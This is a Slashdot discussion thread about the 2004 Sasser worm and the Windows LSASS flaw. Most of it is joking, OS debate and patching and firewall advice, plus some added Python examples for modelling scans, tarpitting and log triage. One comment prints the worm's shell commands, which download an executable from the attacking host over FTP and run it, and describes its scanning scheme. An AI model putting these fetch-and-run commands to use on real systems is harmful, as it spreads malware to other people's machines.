New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
ah... (Score:5, Funny)
Re:ah... (Score:5, Funny)
-- I see your nat box and raise you a proxy server.
Re:ah... (Score:5, Interesting)
1999, the year MS forgot what was said back in 90.
2003, the year of Microsoft's new security initiative.
2004, the year of the Windows worms.
XP SP2, the patch for mentioned "listening state" error.
Re:ah... (Score:3, Insightful)
Ah, actually, Microsoft tried a "new security initiative" back in 2001 as well, IIRC.
The 2003 one is the SECOND "new security initiative" - and seems to be shaping up as effective as the first, that is, nada, zip, zilch, useless, meaningless marketing bullshit.
Nice timeline you had there, though, really shows the Microsoft competence in perspective.
Re:ah... (Score:4, Insightful)
For starters, sendmail and wu-ftpd should have been banned from Earth a long time ago. They have more holes than Swiss cheese. Telnetd should already have been deprecated by ssh, and should not be installed at all.
Re:ah... (Score:3, Funny)
Ha. I have a linux laptop behind a linux iptables NAT box behind another linux iptables NAT box. The NAT boxes are running two different distributions. Beat that if you can.
Re:ah... (Score:3, Funny)
Re:ah... (Score:5, Funny)
I have DOS - which doesn't listen to anything unless you tell it to.
Beat that.
(Well, I'm fibbing, I actually run Windows 2000, Windows XP and Red Hat 7.3. But I remember when I used to tell clients at BOFA that modem security was not an issue with DOS since if you weren't running XTalk or something, DOS could care less if the modem was on. Of course, this meant porn took a lot longer to download...)
Re:ah... (Score:3, Funny)
You are lucky. I have to use a box of gravel for a firewall.
Re:ah... (Score:3, Interesting)
Boy, am I lame!
Re:ah... (Score:4, Funny)
You could be doing SO much more with that much machine -- I mean....It's a PENTIUM 90!! Don't you realize how much power you have right there? It's insanity!
Re:ah... (Score:5, Insightful)
Re:ah... (Score:5, Funny)
LK
Re:ah... (Score:4, Funny)
My firewall is literally a burning wall, DDOS me and I get a large dinner
Re:ah... (Score:5, Insightful)
Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.
Re:ah... (Score:5, Insightful)
Completely patched.
My stupidity was DMZing my firewall. Stupid, STUPID.
Friends don't let friends open their firewalls. Not even to play video games, no matter how many processes they have deactivated.
I think the tragedy here is that most "regular power users" (i.e. the folks who think that they're big shit because they can install antivirus software and change their Windows desktop) probably don't realize that it's entirely possible to have a completely patched Windows machine that can still get infected by a virus if you plug it right into the Internet. I honestly think these things are reaching a critical mass. It'll be interesting to see exactly how that manifests.
I Use X Windows (Score:5, Funny)
What is this 'Windows Update' of which you speak?
Re:I Use X Windows (Score:5, Funny)
"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"
except that it requires you to reboot several times and repeatedly interact with it.
Re:I Use X Windows (Score:5, Insightful)
"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"
isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.
Re:I Use X Windows (Score:5, Funny)
Re:I Use X Windows (Score:3, Interesting)
All that "emerge" stuff breaks Gentoo, sooner or later, every time I've tried it.
Re:I Use X Windows (Score:5, Interesting)
I don't use a Windows machine from the administrator account. When I need to run Update, I switch over and do it as the administrator. I read before I install, and I don't install nonapplicable updates. I don't trust anyone's automagic updaters.
When I've used Gentoo, it's been as a desktop machine. I've installed it 3, maybe 4, times, always building from the minimal install (the one that takes a day and a night, and most of the second day...). I don't muck about and I don't install "foreign" software. Every time I've used Gentoo, it goes belly up after I've installed some update or another.
Gentoo may have an excellent packaging system, but I don't have time or energy or purpose to become an expert on one more proprietary packaging and updating scheme.
Linux touts "choice" all the time, and rightly so. But the fact is that having a plethora of distribution-specific packaging schemes is a major pain that limits choice.
So long as the Linux community fails to agree to, implement, and use a single packaging and updating scheme, Linux will be a nonstarter outside the geek and corporate worlds.
Re:I Use X Windows (Score:3, Funny)
Re:I Use X Windows (Score:4, Informative)
Re:I Use X Windows (Score:3, Funny)
Windows - Where do you want to go today?
Linux - Where do you want to go tomorrow?
BSD - Are you guys coming or what?
Re:I Use X Windows (Score:5, Informative)
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
Re:I Use X Windows (Score:5, Funny)
Full text, in case of slashdotting:
Re:I Use X Windows (Score:5, Funny)
Those monopolistic bastards.
Re:I Use X Windows (Score:5, Funny)
yum --ask-lots-of-useless-questions=yes \
--reboot-for-no-apparent-reason=alot \
--resolve-dependencies-without-my-help=no \
update
Re:I Use X Windows (Score:3, Insightful)
"The X Consortium requests that the following names be used when referring to this software:
X
X Window System
X Version 11
X Window System, Version 11
X11
X Window System is a trademark of X Consortium, Inc. "
Re:I Use X Windows (Score:3, Funny)
Re:I Use X Windows (Score:5, Informative)
Mutex Trapping (Score:5, Interesting)
Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.
This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.
Re:Mutex Trapping (Score:3, Interesting)
Why can't we have something that protects the registry and pops up whenever something wants to go into software/microsoft/windows/run, /runonce, runonceex, etc? 3/4 of the stuff that goes in there, I end up ripping out later. It's dumb that it's so easy for programs to install things there.
Re:Mutex Trapping (Score:5, Informative)
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/ru
Re:Mutex Trapping (Score:5, Informative)
Re:Mutex Trapping (Score:5, Informative)
Access attempts will show up in the event viewer.
Note: use regedt32.exe for Win2000 or earlier. For later versions, regedit.exe does everything (under Edit->Permissions).
Re:Mutex Trapping (Score:5, Informative)
Note this only works on NT-based systems (e.g., WinXP)
Re:Mutex Trapping (Score:5, Informative)
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries.
Re:Mutex Trapping (Score:5, Informative)
Re:Mutex Trapping (Score:5, Informative)
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
Re:Mutex Trapping (Score:3, Informative)
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
Re:Mutex Trapping (Score:3, Insightful)
If there was a mutex checker/blocker program developed, you would just see worm authors switch to a different method of determining if their worm was already running, or randomize the mutex name.
Re:Mutex Trapping (Score:3, Insightful)
Of course. They're going to work around any countermeasure if it goes into popular use. Once upon a time, all programs were allowed to write to the entire filesystem. Remember
Huh? (Score:5, Funny)
A new worm? Oh, there it is.
Removal Instructions (Score:5, Informative)
http://www.microsoft.com/security/incident/sasser
Re:Removal Instructions [mirrors] (Score:5, Funny)
http://fedora.redhat.com [redhat.com]
http://www.gentoo.org [gentoo.org]
http://www.debian.org [debian.org]
http://www.linux-mandrake.com [linux-mandrake.com]
http://www.slackware.com [slackware.com]
Re:Removal Instructions (Score:5, Interesting)
Do you create all your HTML documents from scratch?
This worm release is pretty cool, I think. This is the first time I've got to see the patch deployment process I built with a couple of other people from my group send out patches to the entire company and get pretty much everybody taken care of before the worm was released. We built it from SMS SUS and a bunch of in-house components. 11,000 workstations across the country patched in less than a week, and we could have done it even faster in an emergency.
Regular SUS took care of our servers a week ago.
ah Nice, more work =) (Score:5, Funny)
Thanks Microsoft.
HAHA (Score:5, Funny)
The ad server must be based on Microsoft's new Irony.NET framework!
Re:HAHA (Score:5, Insightful)
i realize you were mostly joking, but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it. and since current viruses are not true malware, the fact that the machine is infected doesn't even matter to the cheap contractor admin "running" the box. as someone mentioned in another story's comment, it's time to make some REAL malware and wake these ijits up.
Re:HAHA (Score:5, Insightful)
They cause the computer to run really slow, and screw things up, including networking settings, killing IE, destroy the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.
When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).
I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of its normal speed, that's enough to take down almost any operation.
killing IE (Score:4, Funny)
Re:HAHA (Score:5, Funny)
And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.
Blaster-style? Uh-oh. (Score:3, Interesting)
Re:Blaster-style? Uh-oh. (Score:4, Interesting)
Visit Windows Update? (Score:5, Funny)
Could you try to find out? (Score:4, Funny)
Dang... (Score:5, Funny)
Re:Dang... (Score:5, Funny)
Security Update Dates (Score:5, Insightful)
Re:Security Update Dates (Score:5, Insightful)
Re:Security Update Dates (Score:3, Insightful)
Re:Security Update Dates (Score:3, Informative)
YA Windows-only software title (Score:5, Funny)
Loose not lose (Score:5, Funny)
Same old, same old.... (Score:5, Insightful)
Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting on keeping all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?
If MS was at all serious about security, they would have all ports closed by default. Or at least offer the possibility of closing them down during install.
How it works (Score:5, Informative)
It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
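The target-selection scheme quoted above is simple enough to model and check. The block below is an added example written for this page, not Sasser's own code and not anything from Symantec; the infected host address is made up for the demo, and the 128-thread figure is only carried along as a constant.

```python
from fractions import Fraction
import random
from collections import Counter

# Constructed values: the infected host's address is an assumption for the demo;
# the 50/25/25 split and the 128 threads are the figures quoted in the post.
INFECTED_HOST = "192.168.37.12"
SCAN_THREADS = 128


def sasser_target(infected_ip, rng):
    """Draw one scan target with the 50/25/25 locality scheme from the post."""
    own = [int(o) for o in infected_ip.split(".")]
    roll = rng.random()
    if roll < 0.50:                      # fully random address
        octets = [rng.randrange(256) for _ in range(4)]
    elif roll < 0.75:                    # same first octet (/8)
        octets = own[:1] + [rng.randrange(256) for _ in range(3)]
    else:                                # same first two octets (/16)
        octets = own[:2] + [rng.randrange(256) for _ in range(2)]
    return ".".join(map(str, octets))


def per_draw_probability(infected_ip, target_ip):
    """Exact probability that a single draw lands on target_ip.

    Each branch is uniform over its range, so the chance of hitting one specific
    address is branch_weight / range_size, summed over the branches whose prefix
    the target shares (a /16 match also satisfies the /8 branch).
    """
    own, tgt = infected_ip.split("."), target_ip.split(".")
    p = Fraction(1, 2) / 2**32            # random branch: all 2^32 addresses
    if tgt[:1] == own[:1]:
        p += Fraction(1, 4) / 2**24       # /8 branch: 2^24 addresses
    if tgt[:2] == own[:2]:
        p += Fraction(1, 4) / 2**16       # /16 branch: 2^16 addresses
    return p


def locality_ratio(infected_ip, target_ip):
    """How many times more often target_ip is probed than an unrelated address."""
    baseline = Fraction(1, 2) / 2**32     # an address sharing no prefix
    return per_draw_probability(infected_ip, target_ip) / baseline


def sample_split(infected_ip, draws=100_000, seed=1):
    """Measure the split empirically.

    The 'random' branch occasionally lands inside the host's own /8 or /16,
    so the measured local buckets come out slightly above 25%.
    """
    rng = random.Random(seed)
    own = infected_ip.split(".")
    counts = Counter()
    for _ in range(draws):
        t = sasser_target(infected_ip, rng).split(".")
        if t[:2] == own[:2]:
            counts["same /16"] += 1
        elif t[:1] == own[:1]:
            counts["same /8"] += 1
        else:
            counts["elsewhere"] += 1
    return {k: v / draws for k, v in counts.items()}


if __name__ == "__main__":
    print(sample_split(INFECTED_HOST))
    print("per-draw bias for a /16 neighbour:",
          locality_ratio(INFECTED_HOST, "192.168.0.1"))
```

The exact numbers are the useful part: an address in the infected host's /16 is 32,897 times more likely to be probed per draw than an address that shares no prefix with it, which is why a single infected machine on your ISP's netblock floods your firewall log while the rest of the Internet barely notices it.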
Bad Link...Here's the Correct One (Score:3, Informative)
Dammit... (Score:4, Interesting)
Re:Dammit... (Score:5, Interesting)
I use the "redirect" feature of the packet filter to do the equivalent of proxy transparency on ports 135,139,445,4444,9996 to local ports with a local listener.
The Sasser worm starts 128 scanning threads to pseudo-random destinations, and on a fast machine can really pump out the packets. If you give it something to talk to on ports 445 and 9996, that considerably slows the scanning behavior.
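A minimal version of the "local listener" half of that setup, as an added example and not the poster's own configuration: it holds every accepted connection open without replying, so each worm thread that lands on it stalls until its own timeout instead of moving on to the next address. The packet-filter redirect itself is not shown; the demo binds an ephemeral loopback port (an assumption for the example, a real deployment would sit on 445 and 9996 behind the redirect) and plays the scanner's side once.

```python
import socket
import threading


class Tarpit:
    """Accept TCP connections on one port and hold them open without answering.

    A scanning thread that connects here blocks in its own send/recv instead of
    moving on to the next random target, which is the slowdown the post describes.
    """

    def __init__(self, host="127.0.0.1", port=0, hold_seconds=300.0):
        self.hold_seconds = hold_seconds
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind((host, port))      # port 0 = ephemeral, for the demo only
        self._srv.listen(128)
        self._srv.settimeout(0.2)         # lets the accept loop notice stop()
        self.port = self._srv.getsockname()[1]
        self._lock = threading.Lock()
        self._stop = threading.Event()
        self._accepted = 0                # total connections ever accepted
        self._held = 0                    # connections currently being held
        self._thread = threading.Thread(target=self._accept_loop, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def stats(self):
        with self._lock:
            return {"accepted": self._accepted, "held": self._held}

    def _accept_loop(self):
        while not self._stop.is_set():
            try:
                conn, _peer = self._srv.accept()
            except socket.timeout:
                continue
            except OSError:               # listening socket closed by stop()
                break
            with self._lock:
                self._accepted += 1
                self._held += 1
            threading.Thread(target=self._hold, args=(conn,), daemon=True).start()

    def _hold(self, conn):
        # Send nothing, read nothing: sit on the connection, then drop it.
        self._stop.wait(self.hold_seconds)
        with self._lock:
            self._held -= 1
        conn.close()

    def stop(self):
        self._stop.set()
        self._srv.close()
        self._thread.join(timeout=2)


def demo(hold_seconds=5.0, client_timeout=0.5):
    """Connect once as a 'scanner' and report what it got back."""
    pit = Tarpit(hold_seconds=hold_seconds).start()
    try:
        client = socket.create_connection(("127.0.0.1", pit.port), timeout=2)
        client.settimeout(client_timeout)
        try:
            client.recv(64)               # the tarpit never writes, so this times out
            got_reply = True
        except (socket.timeout, TimeoutError):
            got_reply = False
        for _ in range(40):               # give the accept thread a moment to book it
            if pit.stats()["accepted"]:
                break
            threading.Event().wait(0.05)
        stats = pit.stats()
        client.close()
    finally:
        pit.stop()
    return {"got_reply": got_reply, **stats}


if __name__ == "__main__":
    print(demo())
```

Against 128 scanning threads the effect is proportional to how many of them you can keep parked at once, so the listen backlog and the hold time matter more than anything clever in the listener.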
This close to removing win2k... (Score:3, Interesting)
1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to Mozilla. I thank MS for this 'cause Moz. owns.
2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. It's not the color scheme either, I tried MS default and it still didn't work.
3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.
All in all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and Win98SE for games. All the backups are current, and I'm waiting for the next problem to make the system more unusable. If I wasn't so damn lazy, this would have been done sooner.
Brendan
Help the poor bastards (Score:5, Funny)
I consider it a public service. Maybe you can even deduct the bandwidth for the upload from your tax.
Days like this... (Score:5, Funny)
(ring)
sigh....
some important points (Score:4, Informative)
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
Windows update freaking out! (Score:5, Funny)
and after some time, a window pops up with the text:
"The software you are installing has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be installed*. Contact your system administrator."
OK, so I contact myself, and wonder what the hell?!?
I just gave M$ a lot of information about the operating system that I'm running... they wrote the friggin' thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!
But well, that's it... I just click "OK" --the only button-- and see the same window appear 3 more times... and blissfully keep my ignorance of what's going on with the installation.
Re:Windows update freaking out! (Score:4, Funny)
"That action can not be performed. Please contact your system administrator."
I always felt like an idiot talking to myself...
Re:Windows update freaking out! (Score:5, Informative)
That's funny. (Score:3, Interesting)
I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
Well done, submitter! (Score:5, Funny)
How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!
Of course, then came the comments... :-)
I was wondering... (Score:5, Funny)
Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but critical administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!
Well... That's just a little... repetitive
Re:I was wondering... (Score:5, Interesting)
It sure is. The last worm [securityfocus.com] wouldn't have worked without one.
Working at PC Club (Score:3, Funny)
This totally sucks. (Score:5, Interesting)
So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.
Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with Ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case because in fact the only port 445 stuff I've done is Windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.
Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
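Telling that kind of noise apart from file sharing is a matter of looking at who is sending the SYNs. The block below is an added example, not the poster's setup: it runs over a few constructed iptables-style log lines, separates TCP hits on Sasser's ports (445, 5554 and 9996, as listed elsewhere in this thread) that come from the LAN from those that come from outside, and flags the loudest outside sources. The LAN prefix, the addresses and the log lines are all made up for the example.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Ports Sasser is known to touch, as listed elsewhere in this thread.
SASSER_PORTS = {445, 5554, 9996}

# Constructed sample: iptables-style kernel log lines. Addresses come from the
# documentation ranges; the LAN prefix is an assumption for the example.
SAMPLE_LOG = """\
May  1 10:02:11 gw kernel: IN=ppp0 OUT= SRC=203.0.113.45 DST=198.51.100.7 PROTO=TCP SPT=2934 DPT=445 SYN
May  1 10:02:14 gw kernel: IN=ppp0 OUT= SRC=203.0.113.45 DST=198.51.100.7 PROTO=TCP SPT=2934 DPT=445 SYN
May  1 10:02:20 gw kernel: IN=ppp0 OUT= SRC=198.51.100.200 DST=198.51.100.7 PROTO=TCP SPT=1041 DPT=445 SYN
May  1 10:02:31 gw kernel: IN=eth1 OUT= SRC=192.168.1.20 DST=192.168.1.10 PROTO=TCP SPT=1122 DPT=445 SYN
May  1 10:03:02 gw kernel: IN=ppp0 OUT= SRC=203.0.113.9 DST=198.51.100.7 PROTO=TCP SPT=3301 DPT=9996 SYN
May  1 10:03:40 gw kernel: IN=ppp0 OUT= SRC=203.0.113.45 DST=198.51.100.7 PROTO=TCP SPT=2990 DPT=5554 SYN
May  1 10:04:05 gw kernel: IN=ppp0 OUT= SRC=198.51.100.200 DST=198.51.100.7 PROTO=TCP SPT=1055 DPT=80 SYN
May  1 10:05:11 gw kernel: IN=ppp0 OUT= SRC=203.0.113.77 DST=198.51.100.7 PROTO=UDP SPT=137 DPT=137 LEN=58
"""
LAN = ip_network("192.168.1.0/24")

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r"PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Pull timestamp, addresses, protocol and destination port out of one log line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {
        "ts": m["ts"],
        "src": ip_address(m["src"]),
        "dst": ip_address(m["dst"]),
        "proto": m["proto"],
        "dpt": int(m["dpt"]),
    }


def triage(log_text, lan=LAN, ports=SASSER_PORTS, noisy_threshold=3):
    """Separate LAN file-sharing traffic from outside probes on the worm's ports.

    Only TCP to the listed ports counts; LAN sources are booked as legitimate
    SMB, everything else is an external probe, tallied per source and per port.
    """
    external = Counter()
    by_port = Counter()
    internal_smb = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["dpt"] not in ports:
            continue
        if rec["src"] in lan:
            internal_smb += 1
            continue
        external[str(rec["src"])] += 1
        by_port[rec["dpt"]] += 1
    noisy = sorted(src for src, n in external.items() if n >= noisy_threshold)
    return {
        "external_probes": sum(external.values()),
        "by_source": dict(external),
        "by_port": dict(by_port),
        "internal_smb": internal_smb,
        "noisy_sources": noisy,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

A summary like this (outside sources hitting 445 that never talk to anything else, a handful of them responsible for most of the hits) is also the kind of thing an ISP abuse desk can act on, which "it's your filesharing" is not.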
I use the best anti virus on the market! (Score:4, Insightful)
Outside the firewall... (Score:5, Interesting)
If you wonder what a virus is : (Score:3, Funny)
Obligatory quote from Linux/*BSD/Mac users (Score:5, Funny)
Nelson, various Simpsons episodes
so thats why my /var/log/messages is so big today (Score:3, Interesting)
goodbye windows update (Score:5, Funny)
Using Symantec AV, I LiveUpdate'd signatures, only to find that it declared System32/w32sup.exe as a trojan and quarantined it.
Patching / Firewalls (Score:5, Insightful)
Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".
Running something other than Windows is not a good reason to ignore security.
Grounded (Score:4, Interesting)
I have to wonder...
Re:Why use windows update? (Score:3, Informative)
You must be an american (Score:5, Funny)
Re:Windows is a joke, but hey, smile. (Score:3, Informative)
In 2k and XP, you can
1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if you they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or
Re:Windows XP SP1 Fixed This! (Score:4, Informative)
Uh... what?
Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. [mitre.org] (emphasis mine)
Re:already feeling it on college campuses (Score:3, Funny)
Re:already feeling it on college campuses (Score:5, Insightful)
> absolutely no proprietary, closed source software would be
> allowed anywhere on my network, especially not the parts
> accessible to students
So, preventing your students from running Mathematica, Maple, Matlab, Visual Studio,... is educationally beneficial in what way?
Yes, closed source software has problems. So does open source. An all-out ban either way helps no one and solves nothing.
Re:Linux is vunerable too (The anti-anti-windows F (Score:5, Insightful)
Re:windows users never fail to amaze me. (Score:4, Insightful)
It attacks a genuine hole in the operating system and is not dependent on anyone even being logged on to the machine at all. It 'hijacks' the LSASS process, which runs in the SYSTEM context. The operating system could not run if LSASS wasn't running as SYSTEM.
Of course, the patch has been available for >2 weeks now, so all of this *should* be moot.